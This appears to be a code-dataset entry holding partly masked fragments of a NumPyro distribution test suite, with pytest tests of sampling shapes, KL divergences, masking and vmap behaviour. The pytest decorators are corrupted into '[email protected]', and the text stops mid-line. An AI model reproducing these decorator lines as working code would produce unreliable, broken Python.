dist.TruncatedPolyaGamma(batch_shape=batch_shape)\n rng_key = random.PRNGKey(0)\n x = jnp.linspace(1e-06, d.truncation_point, num_points)\n prob = d.truncation_point / num_points * jnp.exp(logsumexp(d.log_prob(x\n ), axis=-1))\n assert_allclose(prob, jnp.ones(batch_shape), rtol=0.0001)\n z = d.sample(rng_key, sample_shape=(3000,))\n mean = jnp.mean(z, axis=-1)\n assert_allclose(mean, 0.25 * jnp.ones(batch_shape), rtol=0.07)\n\n\[email protected]('extra_event_dims,expand_shape', [(0, (4, 3, 2, 1)\n ), (0, (4, 3, 2, 2)), (1, (5, 4, 3, 2)), (2, (5, 4, 3))])\ndef test_expand_reshaped_distribution(extra_event_dims, expand_shape):\n loc = jnp.zeros((1, 6))\n scale_tril = jnp.eye(6)\n d = dist.MultivariateNormal(loc, scale_tril=scale_tril)\n full_shape = 4, 1, 1, 1, 6\n reshaped_dist = d.expand([4, 1, 1, 1]).to_event(extra_event_dims)\n cut = 4 - extra_event_dims\n batch_shape, event_shape = full_shape[:cut], full_shape[cut:]\n assert reshaped_dist.batch_shape == batch_shape\n assert reshaped_dist.event_shape == event_shape\n large = reshaped_dist.expand(expand_shape)\n assert large.batch_shape == expand_shape\n assert large.event_shape == event_shape\n with pytest.raises((RuntimeError, ValueError)):\n reshaped_dist.expand(expand_shape + (3,))\n with pytest.raises((RuntimeError, ValueError)):\n large.expand(expand_shape[1:])\n\n\[email protected]('batch_shape, mask_shape', [((), ()), ((2,), ()),\n ((), (2,)), ((2,), (2,)), ((4, 2), (1, 2)), ((2,), (4, 2))])\[email protected]('event_shape', [(), (3,)])\ndef test_mask(batch_shape, event_shape, mask_shape):\n jax_dist = dist.Normal().expand(batch_shape + event_shape).to_event(len\n (event_shape))\n mask = dist.Bernoulli(0.5).sample(random.PRNGKey(0), mask_shape)\n if mask_shape == ():\n mask = bool(mask)\n samples = jax_dist.sample(random.PRNGKey(1))\n actual = jax_dist.mask(mask).log_prob(samples)\n assert_allclose(actual != 0, jnp.broadcast_to(mask, lax.\n broadcast_shapes(batch_shape, mask_shape)))\n\n\[email protected]('event_shape', [(), (4,), (2, 4)])\ndef test_mask_grad(event_shape):\n\n def f(x, data):\n base_dist = dist.Beta(jnp.exp(x), jnp.ones(event_shape)).to_event()\n mask = jnp.all(jnp.isfinite(data), tuple(-i - 1 for i in range(len(\n event_shape))))\n log_prob = base_dist.mask(mask).log_prob(data)\n assert log_prob.shape == data.shape[:len(data.shape) - len(event_shape)\n ]\n return log_prob.sum()\n data = np.array([[0.4, np.nan, 0.2, np.nan], [0.5, 0.5, 0.5, 0.5]])\n log_prob, grad = jax.value_and_grad(f)(1.0, data)\n assert jnp.isfinite(grad) and jnp.isfinite(log_prob)\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DISCRETE +\n DIRECTIONAL)\ndef test_dist_pytree(jax_dist, sp_dist, params):\n\n def f(x):\n return jax_dist(*params)\n if jax_dist is _ImproperWrapper:\n pytest.skip('Cannot flattening ImproperUniform')\n if jax_dist is dist.EulerMaruyama:\n pytest.skip(\"EulerMaruyama doesn't define flatten/unflatten\")\n jax.jit(f)(0)\n lax.map(f, np.ones(3))\n expected_dist = f(0)\n actual_dist = jax.jit(f)(0)\n expected_sample = expected_dist.sample(random.PRNGKey(0))\n actual_sample = actual_dist.sample(random.PRNGKey(0))\n expected_log_prob = expected_dist.log_prob(expected_sample)\n actual_log_prob = actual_dist.log_prob(actual_sample)\n assert_allclose(actual_sample, expected_sample, rtol=1e-06)\n assert_allclose(actual_log_prob, expected_log_prob, rtol=2e-06)\n\n\n<mask token>\n\n\ndef test_expand_no_unnecessary_batch_shape_expansion():\n for arg in (jnp.array(1.0), jnp.ones((2,)), jnp.ones((2, 2))):\n d = dist.Normal(arg, arg).expand([10, 3, *arg.shape])\n roundtripped_d = type(d).tree_unflatten(*d.tree_flatten()[::-1])\n assert d.batch_shape == roundtripped_d.batch_shape\n assert d.base_dist.batch_shape == roundtripped_d.base_dist.batch_shape\n assert d.base_dist.event_shape == roundtripped_d.base_dist.event_shape\n assert jnp.allclose(d.base_dist.loc, roundtripped_d.base_dist.loc)\n assert jnp.allclose(d.base_dist.scale, roundtripped_d.base_dist.scale)\n\n def bs(arg):\n return dist.Normal(arg, arg).expand([10, 3, *arg.shape])\n d = bs(arg)\n dj = jax.jit(bs)(arg)\n assert isinstance(d, dist.ExpandedDistribution)\n assert isinstance(dj, dist.ExpandedDistribution)\n assert d.batch_shape == dj.batch_shape\n assert d.base_dist.batch_shape == dj.base_dist.batch_shape\n assert d.base_dist.event_shape == dj.base_dist.event_shape\n assert jnp.allclose(d.base_dist.loc, dj.base_dist.loc)\n assert jnp.allclose(d.base_dist.scale, dj.base_dist.scale)\n\n\[email protected]('batch_shape', [(), (4,), (2, 3)], ids=str)\ndef test_kl_delta_normal_shape(batch_shape):\n v = np.random.normal(size=batch_shape)\n loc = np.random.normal(size=batch_shape)\n scale = np.exp(np.random.normal(size=batch_shape))\n p = dist.Delta(v)\n q = dist.Normal(loc, scale)\n assert kl_divergence(p, q).shape == batch_shape\n\n\ndef test_kl_delta_normal():\n v = np.random.normal()\n loc = np.random.normal()\n scale = np.exp(np.random.normal())\n p = dist.Delta(v, 10.0)\n q = dist.Normal(loc, scale)\n assert_allclose(kl_divergence(p, q), 10.0 - q.log_prob(v))\n\n\[email protected]('batch_shape', [(), (4,), (2, 3)], ids=str)\[email protected]('event_shape', [(), (4,), (2, 3)], ids=str)\ndef test_kl_independent_normal(batch_shape, event_shape):\n shape = batch_shape + event_shape\n p = dist.Normal(np.random.normal(size=shape), np.exp(np.random.normal(\n size=shape)))\n q = dist.Normal(np.random.normal(size=shape), np.exp(np.random.normal(\n size=shape)))\n actual = kl_divergence(dist.Independent(p, len(event_shape)), dist.\n Independent(q, len(event_shape)))\n expected = sum_rightmost(kl_divergence(p, q), len(event_shape))\n assert_allclose(actual, expected)\n\n\[email protected]('batch_shape', [(), (4,), (2, 3)], ids=str)\[email protected]('event_shape', [(), (4,), (2, 3)], ids=str)\ndef test_kl_expanded_normal(batch_shape, event_shape):\n shape = batch_shape + event_shape\n p = dist.Normal(np.random.normal(), np.exp(np.random.normal())).expand(\n shape)\n q = dist.Normal(np.random.normal(), np.exp(np.random.normal())).expand(\n shape)\n actual = kl_divergence(dist.Independent(p, len(event_shape)), dist.\n Independent(q, len(event_shape)))\n expected = sum_rightmost(kl_divergence(p, q), len(event_shape))\n assert_allclose(actual, expected)\n\n\[email protected]('shape', [(), (4,), (2, 3)], ids=str)\[email protected]('p_dist, q_dist', [(dist.Beta, dist.Beta), (dist.\n Gamma, dist.Gamma), (dist.Kumaraswamy, dist.Beta), (dist.Normal, dist.\n Normal), (dist.Weibull, dist.Gamma)])\ndef test_kl_univariate(shape, p_dist, q_dist):\n\n def make_dist(dist_class):\n params = {}\n for k, c in dist_class.arg_constraints.items():\n if c is constraints.real:\n params[k] = np.random.normal(size=shape)\n elif c is constraints.positive:\n params[k] = np.exp(np.random.normal(size=shape))\n else:\n raise ValueError(f'Missing pattern for param {k}.')\n d = dist_class(**params)\n if dist_class is dist.Kumaraswamy:\n d.KL_KUMARASWAMY_BETA_TAYLOR_ORDER = 1000\n return d\n p = make_dist(p_dist)\n q = make_dist(q_dist)\n actual = kl_divergence(p, q)\n x = p.sample(random.PRNGKey(0), (10000,)).copy()\n expected = jnp.mean(p.log_prob(x) - q.log_prob(x), 0)\n assert_allclose(actual, expected, rtol=0.05)\n\n\[email protected]('shape', [(4,), (2, 3)], ids=str)\ndef test_kl_dirichlet_dirichlet(shape):\n p = dist.Dirichlet(np.exp(np.random.normal(size=shape)))\n q = dist.Dirichlet(np.exp(np.random.normal(size=shape)))\n actual = kl_divergence(p, q)\n x = p.sample(random.PRNGKey(0), (10000,)).copy()\n expected = jnp.mean(p.log_prob(x) - q.log_prob(x), 0)\n assert_allclose(actual, expected, rtol=0.05)\n\n\ndef test_vmapped_binomial_p0():\n\n def sample_binomial_withp0(key):\n n = 2 * (random.uniform(key) > 0.5)\n _, key = random.split(key)\n return dist.Binomial(total_count=n, probs=0).sample(key)\n jax.vmap(sample_binomial_withp0)(random.split(random.PRNGKey(0), 1))\n\n\n<mask token>\n\n\ndef _allclose_or_equal(a1, a2):\n if isinstance(a1, np.ndarray):\n return np.allclose(a2, a1)\n elif isinstance(a1, jnp.ndarray):\n return jnp.allclose(a2, a1)\n elif isinstance(a1, csr_matrix):\n return np.allclose(a2.todense(), a1.todense())\n else:\n return a2 == a1 or a2 is a1\n\n\ndef _tree_equal(t1, t2):\n t = jax.tree_util.tree_map(_allclose_or_equal, t1, t2)\n return jnp.all(jax.flatten_util.ravel_pytree(t)[0])\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DISCRETE +\n DIRECTIONAL)\ndef test_vmap_dist(jax_dist, sp_dist, params):\n param_names = list(inspect.signature(jax_dist).parameters.keys())\n vmappable_param_idxs = _get_vmappable_dist_init_params(jax_dist)\n vmappable_param_idxs = vmappable_param_idxs[:len(params)]\n if len(vmappable_param_idxs) == 0:\n return\n\n def make_jax_dist(*params):\n return jax_dist(*params)\n\n def sample(d: dist.Distribution):\n return d.sample(random.PRNGKey(0))\n d = make_jax_dist(*params)\n if isinstance(d, _SparseCAR) and d.is_sparse:\n return\n in_out_axes_cases = [(tuple(0 if i in vmappable_param_idxs else None for\n i in range(len(params))), 0), *(([(0 if i == idx else None) for i in\n range(len(params))], 0) for idx in vmappable_param_idxs if params[\n idx] is not None), *(([(0 if i == idx else None) for i in range(len\n (params))], vmap_over(d, **{param_names[idx]: 0})) for idx in\n vmappable_param_idxs if params[idx] is not None), *(([(1 if i ==\n idx else None) for i in range(len(params))], vmap_over(d, **{\n param_names[idx]: 1})) for idx in vmappable_param_idxs if \n isinstance(params[idx], jnp.ndarray) and jnp.array(params[idx]).\n ndim > 0 and jax_dist is not _GeneralMixture)]\n for in_axes, out_axes in in_out_axes_cases:\n batched_params = [(jax.tree_map(lambda x: jnp.expand_dims(x, ax),\n arg) if isinstance(ax, int) else arg) for arg, ax in zip(params,\n in_axes)]\n d = make_jax_dist(*params)\n batched_d = jax.vmap(make_jax_dist, in_axes=in_axes, out_axes=out_axes\n )(*batched_params)\n eq = vmap(lambda x, y: _tree_equal(x, y), in_axes=(out_axes, None))(\n batched_d, d)\n assert eq == jnp.array([True])\n samples_dist = sample(d)\n samples_batched_dist = jax.vmap(sample, in_axes=(out_axes,))(batched_d)\n assert samples_batched_dist.shape == (1, *samples_dist.shape)\n\n\ndef test_multinomial_abstract_total_count():\n probs = jnp.array([0.2, 0.5, 0.3])\n key = random.PRNGKey(0)\n\n def f(x):\n total_count = x.sum(-1)\n return dist.Multinomial(total_count, probs=probs, total_count_max=10\n ).sample(key)\n x = dist.Multinomial(10, probs).sample(key)\n y = jax.jit(f)(x)\n assert_allclose(x, y, rtol=1e-06)\n\n\ndef test_normal_log_cdf():\n loc = jnp.array([[0.0, -10.0, 20.0]])\n scale = jnp.array([[1, 5, 7]])\n values = jnp.linspace(-5, 5, 100).reshape(-1, 1)\n numpyro_log_cdf = dist.Normal(loc=loc, scale=scale).log_cdf(values)\n numpyro_cdf = dist.Normal(loc=loc, scale=scale).cdf(values)\n jax_log_cdf = jax_norm.logcdf(loc=loc, scale=scale, x=values)\n assert_allclose(numpyro_log_cdf, jax_log_cdf)\n assert_allclose(jnp.exp(numpyro_log_cdf), numpyro_cdf, rtol=1e-06)\n\n\[email protected]('value', [-15.0, jnp.array([[-15.0], [-10.0], [-\n 5.0]]), jnp.array([[[-15.0], [-10.0], [-5.0]], [[-14.0], [-9.0], [-4.0]]])]\n )\ndef test_truncated_normal_log_prob_in_tail(value):\n loc = 1.35\n scale = jnp.geomspace(0.01, 1, 10)\n low, high = -20, -1.0\n a, b = (low - loc) / scale, (high - loc) / scale\n numpyro_log_prob = dist.TruncatedNormal(loc, scale, low=low, high=high\n ).log_prob(value)\n jax_log_prob = jax_truncnorm.logpdf(value, loc=loc, scale=scale, a=a, b=b)\n assert_allclose(numpyro_log_prob, jax_log_prob, rtol=1e-06)\n\n\ndef test_sample_truncated_normal_in_tail():\n tail_dist = dist.TruncatedNormal(loc=0, scale=1, low=-16, high=-15)\n samples = tail_dist.sample(random.PRNGKey(0), sample_shape=(10000,))\n assert ~jnp.isinf(samples).any()\n\n\[email protected]_custom_prng()\ndef test_jax_custom_prng():\n samples = dist.Normal(0, 5).sample(random.PRNGKey(0), sample_shape=(1000,))\n assert ~jnp.isinf(samples).any()\n",
"step-4": "<mask token>\n\n\ndef my_kron(A, B):\n D = A[..., :, None, :, None] * B[..., None, :, None, :]\n ds = D.shape\n newshape = *ds[:-4], ds[-4] * ds[-3], ds[-2] * ds[-1]\n return D.reshape(newshape)\n\n\ndef _identity(x):\n return x\n\n\ndef _circ_mean(angles):\n return jnp.arctan2(jnp.mean(jnp.sin(angles), axis=0), jnp.mean(jnp.cos(\n angles), axis=0))\n\n\ndef sde_fn1(x, _):\n lam = 0.1\n sigma2 = 0.1\n return lam * x, sigma2\n\n\n<mask token>\n\n\nclass T(namedtuple('TestCase', ['jax_dist', 'sp_dist', 'params'])):\n\n def __new__(cls, jax_dist, *params):\n sp_dist = get_sp_dist(jax_dist)\n return super(cls, T).__new__(cls, jax_dist, sp_dist, params)\n\n\ndef _mvn_to_scipy(loc, cov, prec, tril):\n jax_dist = dist.MultivariateNormal(loc, cov, prec, tril)\n mean = jax_dist.mean\n cov = jax_dist.covariance_matrix\n return osp.multivariate_normal(mean=mean, cov=cov)\n\n\ndef _multivariate_t_to_scipy(df, loc, tril):\n if scipy.__version__ < '1.6.0':\n pytest.skip(\n 'Multivariate Student-T distribution is not available in scipy < 1.6'\n )\n jax_dist = dist.MultivariateStudentT(df, loc, tril)\n mean = jax_dist.mean\n cov = jax_dist.covariance_matrix\n return osp.multivariate_t(loc=mean, shape=cov, df=df)\n\n\ndef _lowrank_mvn_to_scipy(loc, cov_fac, cov_diag):\n jax_dist = dist.LowRankMultivariateNormal(loc, cov_fac, cov_diag)\n mean = jax_dist.mean\n cov = jax_dist.covariance_matrix\n return osp.multivariate_normal(mean=mean, cov=cov)\n\n\n<mask token>\n\n\ndef _TruncatedNormal(loc, scale, low, high):\n return dist.TruncatedNormal(loc=loc, scale=scale, low=low, high=high)\n\n\ndef _TruncatedCauchy(loc, scale, low, high):\n return dist.TruncatedCauchy(loc=loc, scale=scale, low=low, high=high)\n\n\n<mask token>\n\n\nclass SineSkewedUniform(dist.SineSkewed):\n\n def __init__(self, skewness, **kwargs):\n lower, upper = np.array([-math.pi, -math.pi]), np.array([math.pi,\n math.pi])\n base_dist = dist.Uniform(lower, upper, **kwargs).to_event(lower.ndim)\n super().__init__(base_dist, skewness, **kwargs)\n\n\n@vmap_over.register\ndef _vmap_over_sine_skewed_uniform(self: SineSkewedUniform, skewness=None):\n return vmap_over.dispatch(dist.SineSkewed)(self, base_dist=None,\n skewness=skewness)\n\n\nclass SineSkewedVonMises(dist.SineSkewed):\n\n def __init__(self, skewness, **kwargs):\n von_loc, von_conc = np.array([0.0]), np.array([1.0])\n base_dist = dist.VonMises(von_loc, von_conc, **kwargs).to_event(von_loc\n .ndim)\n super().__init__(base_dist, skewness, **kwargs)\n\n\n<mask token>\n\n\nclass SineSkewedVonMisesBatched(dist.SineSkewed):\n\n def __init__(self, skewness, **kwargs):\n von_loc, von_conc = np.array([0.0, -1.234]), np.array([1.0, 10.0])\n base_dist = dist.VonMises(von_loc, von_conc, **kwargs).to_event(von_loc\n .ndim)\n super().__init__(base_dist, skewness, **kwargs)\n\n\n@vmap_over.register\ndef _vmap_over_sine_skewed_von_mises_batched(self:\n SineSkewedVonMisesBatched, skewness=None):\n return vmap_over.dispatch(dist.SineSkewed)(self, base_dist=None,\n skewness=skewness)\n\n\nclass _GaussianMixture(dist.MixtureSameFamily):\n arg_constraints = {}\n reparametrized_params = []\n\n def __init__(self, mixing_probs, loc, scale):\n component_dist = dist.Normal(loc=loc, scale=scale)\n mixing_distribution = dist.Categorical(probs=mixing_probs)\n super().__init__(mixing_distribution=mixing_distribution,\n component_distribution=component_dist)\n\n @property\n def loc(self):\n return self.component_distribution.loc\n\n @property\n def scale(self):\n return self.component_distribution.scale\n\n\n@vmap_over.register\ndef _vmap_over_gaussian_mixture(self: _GaussianMixture, loc=None, scale=None):\n component_distribution = vmap_over(self.component_distribution, loc=loc,\n scale=scale)\n return vmap_over.dispatch(dist.MixtureSameFamily)(self,\n _component_distribution=component_distribution)\n\n\nclass _Gaussian2DMixture(dist.MixtureSameFamily):\n arg_constraints = {}\n reparametrized_params = []\n\n def __init__(self, mixing_probs, loc, covariance_matrix):\n component_dist = dist.MultivariateNormal(loc=loc, covariance_matrix\n =covariance_matrix)\n mixing_distribution = dist.Categorical(probs=mixing_probs)\n super().__init__(mixing_distribution=mixing_distribution,\n component_distribution=component_dist)\n\n @property\n def loc(self):\n return self.component_distribution.loc\n\n @property\n def covariance_matrix(self):\n return self.component_distribution.covariance_matrix\n\n\n@vmap_over.register\ndef _vmap_over_gaussian_2d_mixture(self: _Gaussian2DMixture, loc=None):\n component_distribution = vmap_over(self.component_distribution, loc=loc)\n return vmap_over.dispatch(dist.MixtureSameFamily)(self,\n _component_distribution=component_distribution)\n\n\nclass _GeneralMixture(dist.MixtureGeneral):\n arg_constraints = {}\n reparametrized_params = []\n\n def __init__(self, mixing_probs, locs, scales):\n component_dists = [dist.Normal(loc=loc_, scale=scale_) for loc_,\n scale_ in zip(locs, scales)]\n mixing_distribution = dist.Categorical(probs=mixing_probs)\n return super().__init__(mixing_distribution=mixing_distribution,\n component_distributions=component_dists)\n\n @property\n def locs(self):\n return self.component_distributions[0].loc\n\n @property\n def scales(self):\n return self.component_distributions[0].scale\n\n\n@vmap_over.register\ndef _vmap_over_general_mixture(self: _GeneralMixture, locs=None, scales=None):\n component_distributions = [vmap_over(d, loc=locs, scale=scales) for d in\n self.component_distributions]\n return vmap_over.dispatch(dist.MixtureGeneral)(self,\n _component_distributions=component_distributions)\n\n\nclass _General2DMixture(dist.MixtureGeneral):\n arg_constraints = {}\n reparametrized_params = []\n\n def __init__(self, mixing_probs, locs, covariance_matrices):\n component_dists = [dist.MultivariateNormal(loc=loc_,\n covariance_matrix=covariance_matrix) for loc_,\n covariance_matrix in zip(locs, covariance_matrices)]\n mixing_distribution = dist.Categorical(probs=mixing_probs)\n return super().__init__(mixing_distribution=mixing_distribution,\n component_distributions=component_dists)\n\n @property\n def locs(self):\n return self.component_distributions[0].loc\n\n @property\n def covariance_matrices(self):\n return self.component_distributions[0].covariance_matrix\n\n\n@vmap_over.register\ndef _vmap_over_general_2d_mixture(self: _General2DMixture, locs=None):\n component_distributions = [vmap_over(d, loc=locs) for d in self.\n component_distributions]\n return vmap_over.dispatch(dist.MixtureGeneral)(self,\n _component_distributions=component_distributions)\n\n\nclass _ImproperWrapper(dist.ImproperUniform):\n\n def sample(self, key, sample_shape=()):\n transform = biject_to(self.support)\n prototype_value = jnp.zeros(self.event_shape)\n unconstrained_event_shape = jnp.shape(transform.inv(prototype_value))\n shape = sample_shape + self.batch_shape + unconstrained_event_shape\n unconstrained_samples = random.uniform(key, shape, minval=-2, maxval=2)\n return transform(unconstrained_samples)\n\n\nclass ZeroInflatedPoissonLogits(dist.discrete.ZeroInflatedLogits):\n arg_constraints = {'rate': constraints.positive, 'gate_logits':\n constraints.real}\n pytree_data_fields = 'rate',\n\n def __init__(self, rate, gate_logits, *, validate_args=None):\n self.rate = rate\n super().__init__(dist.Poisson(rate), gate_logits, validate_args=\n validate_args)\n\n\n@vmap_over.register\ndef _vmap_over_zero_inflated_poisson_logits(self: ZeroInflatedPoissonLogits,\n rate=None, gate_logits=None):\n dist_axes = vmap_over.dispatch(dist.discrete.ZeroInflatedLogits)(self,\n base_dist=vmap_over(self.base_dist, rate=rate), gate_logits=\n gate_logits, gate=gate_logits)\n dist_axes.rate = rate\n return dist_axes\n\n\nclass SparsePoisson(dist.Poisson):\n\n def __init__(self, rate, *, validate_args=None):\n super().__init__(rate, is_sparse=True, validate_args=validate_args)\n\n\nclass FoldedNormal(dist.FoldedDistribution):\n arg_constraints = {'loc': constraints.real, 'scale': constraints.positive}\n\n def __init__(self, loc, scale, validate_args=None):\n self.loc = loc\n self.scale = scale\n super().__init__(dist.Normal(loc, scale), validate_args=validate_args)\n\n\n@vmap_over.register\ndef _vmap_over_folded_normal(self: 'FoldedNormal', loc=None, scale=None):\n d = vmap_over.dispatch(dist.FoldedDistribution)(self, base_dist=\n vmap_over(self.base_dist, loc=loc, scale=scale))\n d.loc = loc\n d.scale = scale\n return d\n\n\nclass _SparseCAR(dist.CAR):\n reparametrized_params = ['loc', 'correlation', 'conditional_precision']\n\n def __init__(self, loc, correlation, conditional_precision, adj_matrix,\n *, is_sparse=True, validate_args=None):\n super().__init__(loc, correlation, conditional_precision,\n adj_matrix, is_sparse=True, validate_args=validate_args)\n\n\n<mask token>\n\n\ndef get_sp_dist(jax_dist):\n classes = jax_dist.mro() if isinstance(jax_dist, type) else [jax_dist]\n for cls in classes:\n if cls in _DIST_MAP:\n return _DIST_MAP[cls]\n\n\n<mask token>\n\n\ndef _is_batched_multivariate(jax_dist):\n return len(jax_dist.event_shape) > 0 and len(jax_dist.batch_shape) > 0\n\n\ndef gen_values_within_bounds(constraint, size, key=random.PRNGKey(11)):\n eps = 1e-06\n if constraint is constraints.boolean:\n return random.bernoulli(key, shape=size)\n elif isinstance(constraint, constraints.greater_than):\n return jnp.exp(random.normal(key, size)) + constraint.lower_bound + eps\n elif isinstance(constraint, constraints.integer_interval):\n lower_bound = jnp.broadcast_to(constraint.lower_bound, size)\n upper_bound = jnp.broadcast_to(constraint.upper_bound, size)\n return random.randint(key, size, lower_bound, upper_bound + 1)\n elif isinstance(constraint, constraints.integer_greater_than):\n return constraint.lower_bound + random.poisson(key, np.array(5),\n shape=size)\n elif isinstance(constraint, constraints.interval):\n lower_bound = jnp.broadcast_to(constraint.lower_bound, size)\n upper_bound = jnp.broadcast_to(constraint.upper_bound, size)\n return random.uniform(key, size, minval=lower_bound, maxval=upper_bound\n )\n elif constraint in (constraints.real, constraints.real_vector):\n return random.normal(key, size)\n elif constraint is constraints.simplex:\n return osp.dirichlet.rvs(alpha=jnp.ones((size[-1],)), size=size[:-1])\n elif isinstance(constraint, constraints.multinomial):\n n = size[-1]\n return multinomial(key, p=jnp.ones((n,)) / n, n=constraint.\n upper_bound, shape=size[:-1])\n elif constraint is constraints.corr_cholesky:\n return signed_stick_breaking_tril(random.uniform(key, size[:-2] + (\n size[-1] * (size[-1] - 1) // 2,), minval=-1, maxval=1))\n elif constraint is constraints.corr_matrix:\n cholesky = signed_stick_breaking_tril(random.uniform(key, size[:-2] +\n (size[-1] * (size[-1] - 1) // 2,), minval=-1, maxval=1))\n return jnp.matmul(cholesky, jnp.swapaxes(cholesky, -2, -1))\n elif constraint is constraints.lower_cholesky:\n return jnp.tril(random.uniform(key, size))\n elif constraint is constraints.positive_definite:\n x = random.normal(key, size)\n return jnp.matmul(x, jnp.swapaxes(x, -2, -1))\n elif constraint is constraints.ordered_vector:\n x = jnp.cumsum(random.exponential(key, size), -1)\n return x - random.normal(key, size[:-1] + (1,))\n elif isinstance(constraint, constraints.independent):\n return gen_values_within_bounds(constraint.base_constraint, size, key)\n elif constraint is constraints.sphere:\n x = random.normal(key, size)\n return x / jnp.linalg.norm(x, axis=-1)\n elif constraint is constraints.l1_ball:\n key1, key2 = random.split(key)\n sign = random.bernoulli(key1)\n bounds = [0, (-1) ** sign * 0.5]\n return random.uniform(key, size, float, *sorted(bounds))\n else:\n raise NotImplementedError('{} not implemented.'.format(constraint))\n\n\ndef gen_values_outside_bounds(constraint, size, key=random.PRNGKey(11)):\n if constraint is constraints.boolean:\n return random.bernoulli(key, shape=size) - 2\n elif isinstance(constraint, constraints.greater_than):\n return constraint.lower_bound - jnp.exp(random.normal(key, size))\n elif isinstance(constraint, constraints.integer_interval):\n lower_bound = jnp.broadcast_to(constraint.lower_bound, size)\n return random.randint(key, size, lower_bound - 1, lower_bound)\n elif isinstance(constraint, constraints.integer_greater_than):\n return constraint.lower_bound - random.poisson(key, np.array(5),\n shape=size)\n elif isinstance(constraint, constraints.interval):\n upper_bound = jnp.broadcast_to(constraint.upper_bound, size)\n return random.uniform(key, size, minval=upper_bound, maxval=\n upper_bound + 1.0)\n elif constraint in [constraints.real, constraints.real_vector]:\n return lax.full(size, np.nan)\n elif constraint is constraints.simplex:\n return osp.dirichlet.rvs(alpha=jnp.ones((size[-1],)), size=size[:-1]\n ) + 0.01\n elif isinstance(constraint, constraints.multinomial):\n n = size[-1]\n return multinomial(key, p=jnp.ones((n,)) / n, n=constraint.\n upper_bound, shape=size[:-1]) + 1\n elif constraint is constraints.corr_cholesky:\n return signed_stick_breaking_tril(random.uniform(key, size[:-2] + (\n size[-1] * (size[-1] - 1) // 2,), minval=-1, maxval=1)) + 0.01\n elif constraint is constraints.corr_matrix:\n cholesky = 0.01 + signed_stick_breaking_tril(random.uniform(key, \n size[:-2] + (size[-1] * (size[-1] - 1) // 2,), minval=-1, maxval=1)\n )\n return jnp.matmul(cholesky, jnp.swapaxes(cholesky, -2, -1))\n elif constraint is constraints.lower_cholesky:\n return random.uniform(key, size)\n elif constraint is constraints.positive_definite:\n return random.normal(key, size)\n elif constraint is constraints.ordered_vector:\n x = jnp.cumsum(random.exponential(key, size), -1)\n return x[..., ::-1]\n elif isinstance(constraint, constraints.independent):\n return gen_values_outside_bounds(constraint.base_constraint, size, key)\n elif constraint is constraints.sphere:\n x = random.normal(key, size)\n x = x / jnp.linalg.norm(x, axis=-1, keepdims=True)\n return 2 * x\n elif constraint is constraints.l1_ball:\n key1, key2 = random.split(key)\n sign = random.bernoulli(key1)\n bounds = [(-1) ** sign * 1.1, (-1) ** sign * 2]\n return random.uniform(key, size, float, *sorted(bounds))\n else:\n raise NotImplementedError('{} not implemented.'.format(constraint))\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DISCRETE +\n DIRECTIONAL)\[email protected]('prepend_shape', [(), (2,), (2, 3)])\ndef test_dist_shape(jax_dist, sp_dist, params, prepend_shape):\n jax_dist = jax_dist(*params)\n rng_key = random.PRNGKey(0)\n expected_shape = (prepend_shape + jax_dist.batch_shape + jax_dist.\n event_shape)\n samples = jax_dist.sample(key=rng_key, sample_shape=prepend_shape)\n assert isinstance(samples, jnp.ndarray)\n assert jnp.shape(samples) == expected_shape\n if sp_dist and not _is_batched_multivariate(jax_dist) and not isinstance(\n jax_dist, dist.MultivariateStudentT):\n sp_dist = sp_dist(*params)\n sp_samples = sp_dist.rvs(size=prepend_shape + jax_dist.batch_shape)\n assert jnp.shape(sp_samples) == expected_shape\n elif sp_dist and not _is_batched_multivariate(jax_dist) and isinstance(\n jax_dist, dist.MultivariateStudentT):\n sp_dist = sp_dist(*params)\n size_ = prepend_shape + jax_dist.batch_shape\n size = 1 if size_ == () else size_\n try:\n sp_samples = sp_dist.rvs(size=size)\n except ValueError:\n pytest.skip(\n \"scipy multivariate t doesn't support size with > 1 element\")\n assert jnp.shape(sp_samples) == expected_shape\n if isinstance(jax_dist, (dist.MultivariateNormal, dist.\n MultivariateStudentT)):\n assert jax_dist.covariance_matrix.ndim == len(jax_dist.batch_shape) + 2\n assert_allclose(jax_dist.precision_matrix, jnp.linalg.inv(jax_dist.\n covariance_matrix), rtol=1e-06)\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DISCRETE +\n DIRECTIONAL)\ndef test_infer_shapes(jax_dist, sp_dist, params):\n shapes = tuple(getattr(p, 'shape', ()) for p in params)\n shapes = tuple(x() if callable(x) else x for x in shapes)\n jax_dist = jax_dist(*params)\n try:\n expected_batch_shape, expected_event_shape = type(jax_dist\n ).infer_shapes(*shapes)\n except NotImplementedError:\n pytest.skip(\n f'{type(jax_dist).__name__}.infer_shapes() is not implemented')\n assert jax_dist.batch_shape == expected_batch_shape\n assert jax_dist.event_shape == expected_event_shape\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DISCRETE +\n DIRECTIONAL)\ndef test_has_rsample(jax_dist, sp_dist, params):\n jax_dist = jax_dist(*params)\n masked_dist = jax_dist.mask(False)\n indept_dist = jax_dist.expand_by([2]).to_event(1)\n transf_dist = dist.TransformedDistribution(jax_dist, biject_to(\n constraints.real))\n assert masked_dist.has_rsample == jax_dist.has_rsample\n assert indept_dist.has_rsample == jax_dist.has_rsample\n assert transf_dist.has_rsample == jax_dist.has_rsample\n if jax_dist.has_rsample:\n assert isinstance(jax_dist, dist.Delta) or not jax_dist.is_discrete\n if isinstance(jax_dist, dist.TransformedDistribution):\n assert jax_dist.base_dist.has_rsample\n else:\n assert set(jax_dist.arg_constraints) == set(jax_dist.\n reparametrized_params)\n jax_dist.rsample(random.PRNGKey(0))\n if isinstance(jax_dist, dist.Normal):\n masked_dist.rsample(random.PRNGKey(0))\n indept_dist.rsample(random.PRNGKey(0))\n transf_dist.rsample(random.PRNGKey(0))\n else:\n with pytest.raises(NotImplementedError):\n jax_dist.rsample(random.PRNGKey(0))\n if isinstance(jax_dist, dist.BernoulliProbs):\n with pytest.raises(NotImplementedError):\n masked_dist.rsample(random.PRNGKey(0))\n with pytest.raises(NotImplementedError):\n indept_dist.rsample(random.PRNGKey(0))\n with pytest.raises(NotImplementedError):\n transf_dist.rsample(random.PRNGKey(0))\n\n\[email protected]('batch_shape', [(), (4,), (3, 2)])\ndef test_unit(batch_shape):\n log_factor = random.normal(random.PRNGKey(0), batch_shape)\n d = dist.Unit(log_factor=log_factor)\n x = d.sample(random.PRNGKey(1))\n assert x.shape 